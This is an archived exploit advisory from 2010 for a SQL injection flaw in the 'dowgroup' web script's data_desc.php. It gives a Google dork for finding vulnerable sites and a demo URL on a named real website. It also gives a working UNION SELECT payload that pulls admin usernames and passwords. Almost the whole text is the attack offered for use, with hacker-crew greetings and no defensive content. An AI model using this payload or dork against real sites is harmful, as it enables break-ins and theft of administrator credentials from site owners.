Dow Group suffers from a remote SQL injection vulnerability in data_desc.php.
4498dc8f83d05c698736392ff7d79a26f7d2416cd5fd3560af2b7253a9dfae68
===================================================================================+
# Exploit Title: dowgroup sql injection
# Date: 12-01-2010
# Author: Memati
==============================================================================
[*] Note : Keep Away Of Muslim Site
==============================================================================
[*] My home: [ http://sec-war.com ]
[*] For Ask: [hebarieh@hotmail.com]
[*] Script: [ dowgroup ]
[*] Founder: [ Memati ]
[*] Dork: [ Powered by www.dowgroup.com<http://www.dowgroup.com> ]
########################################################################
===[ Demo ]=== http://www.stocksforlife.com/data_desc.php?data=articles&id=80
===[ eXPLOIT ]=== union+select+1,concat_ws(0x3a,username,0x3a,password),3,4,5+from+admin--
[*] Gr33t : [ alnjm33 - pretador - ahmadso - jamba - jago-dz - root egy - egy sniper - xxx -xr57 - Super cristal- Red Virus - all sec-war.com]
________________________________
Hotmail: Trusted email with Microsoft’s powerful SPAM protection. Sign up now.<https://signup.live.com/signup.aspx?id=60969>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed